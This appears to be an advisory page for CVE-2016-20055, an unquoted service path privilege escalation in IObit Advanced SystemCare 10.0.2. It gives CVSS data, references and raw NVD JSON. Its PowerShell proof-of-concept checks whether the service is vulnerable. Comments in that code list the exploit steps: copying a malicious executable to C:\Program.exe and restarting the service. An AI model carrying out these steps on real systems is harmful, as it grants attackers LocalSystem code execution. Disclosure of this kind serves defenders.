Security Vulnerability Report
CVE-2016-20055 CVSS 7.8 HIGH

CVE-2016-20055

Published: 2026-04-04 14:16:18
Last Modified: 2026-04-14 19:09:28

Description

IObit Advanced SystemCare 10.0.2 contains an unquoted service path vulnerability in the AdvancedSystemCareService10 service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the service path and trigger privilege escalation when the service restarts or the system reboots, executing code with LocalSystem privileges.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:iobit:advanced_system_care:*:*:*:*:free:*:*:* - VULNERABLE
IObit Advanced SystemCare 10.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
powershell
# Check for unquoted service paths (PowerShell)
$service = Get-WmiObject -Class Win32_Service -Filter "Name='AdvancedSystemCareService10'"
if ($service) {
    $path = $service.PathName
    if ($path -notmatch '^"' -and $path -match ' ') {
        Write-Host "[+] Vulnerable Service Found: $($service.Name)"
        Write-Host "[+] Path: $path"
        # Exploit Logic (Conceptual)
        # 1. Identify the vulnerable segment (e.g., C:\Program.exe)
        # 2. Copy malicious payload to that location
        #    Copy-Item .\malicious.exe "C:\Program.exe"
        # 3. Restart service to trigger
        #    Restart-Service -Name $service.Name
    } else {
        Write-Host "[-] Service path is quoted or has no spaces."
    }
} else {
    Write-Host "[-] Service not found."
}

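References

http://www.iobit.com/en/advancedsystemcarefree.php# (Product)
http://www.iobit.com/en/index.php (Product)
https://www.exploit-db.com/exploits/40577 (Exploit, VDB Entry)
https://www.vulncheck.com/advisories/iobit-advanced-systemcare-unquoted-service-path-privilege-escalation (Third Party Advisory)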

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20055", "sourceIdentifier": "[email protected]", "published": "2026-04-04T14:16:17.863", "lastModified": "2026-04-14T19:09:27.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IObit Advanced SystemCare 10.0.2 contains an unquoted service path vulnerability in the AdvancedSystemCareService10 service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the service path and trigger privilege escalation when the service restarts or the system reboots, executing code with LocalSystem privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:iobit:advanced_system_care:*:*:*:*:free:*:*:*", "versionEndIncluding": "10.0.2", "matchCriteriaId": "7E20F4E8-FEA2-4666-AFA2-5C176DDD50C9"}]}]}], "references": [{"url": "http://www.iobit.com/en/advancedsystemcarefree.php#", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.iobit.com/en/index.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/40577", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/iobit-advanced-systemcare-unquoted-service-path-privilege-escalation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}